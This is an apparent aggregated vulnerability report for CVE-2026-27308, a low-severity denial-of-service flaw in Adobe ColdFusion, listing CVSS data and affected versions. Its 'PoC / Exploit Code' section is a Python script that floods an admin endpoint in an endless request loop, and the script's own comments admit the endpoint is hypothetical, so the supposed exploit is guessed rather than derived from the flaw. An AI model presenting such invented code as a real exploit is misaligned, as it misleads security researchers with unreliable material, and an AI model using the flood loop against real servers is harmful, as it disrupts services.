Security Vulnerability Report
CVE-2026-27308 CVSS 2.4 LOW


Published: 2026-04-14 22:16:30
Last Modified: 2026-04-16 14:40:43

Description

ColdFusion versions 2023.18, 2025.6 and earlier are affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. A high-privileged attacker could exploit this vulnerability and exhaust system resources, reducing application speed. Exploitation of this issue does not require user interaction.

CVSS Details

CVSS Score: 2.4
Severity: LOW
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:adobe:coldfusion:2023:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:coldfusion:2023:update1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:coldfusion:2023:update10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:coldfusion:2023:update11:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:coldfusion:2023:update12:*:*:*:*:*:* - VULNERABLE
Adobe ColdFusion 2023 <= 2023.18
Adobe ColdFusion 2025 <= 2025.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
import requests


def cve_2026_27308_poc(target_url, session_cookie):
    """
    Proof of Concept for CVE-2026-27308 (Adobe ColdFusion).
    This script attempts to exhaust system resources by sending
    repeated requests to a vulnerable endpoint.
    Note: Requires High Privileges (Admin Session).
    """
    headers = {
        "Cookie": session_cookie,
        "User-Agent": "CVE-2026-27308-POC/1.0"
    }

    # Hypothetical endpoint that triggers resource consumption
    # Based on the vulnerability description
    endpoint = f"{target_url}/CFIDE/adminapi/vulnerable_endpoint.cfm"

    print(f"[+] Targeting: {target_url}")
    print(f"[+] Attacking endpoint: {endpoint}")
    print(f"[!] Attempting to exhaust resources...")

    try:
        # Infinite loop to simulate resource exhaustion attack
        while True:
            response = requests.get(endpoint, headers=headers, timeout=10)
            if response.status_code == 200:
                print("[+] Request sent, consuming resources...")
            else:
                print(f"[-] Unexpected status code: {response.status_code}")
                break
    except KeyboardInterrupt:
        print("\n[-] Exploitation stopped by user.")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")


if __name__ == "__main__":
    # Replace with actual target and admin session cookie
    target = "http://127.0.0.1:8500"
    cookie = "CFAUTHORIZATION_cfadmin=..."
    cve_2026_27308_poc(target, cookie)

References

Raw JSON Data
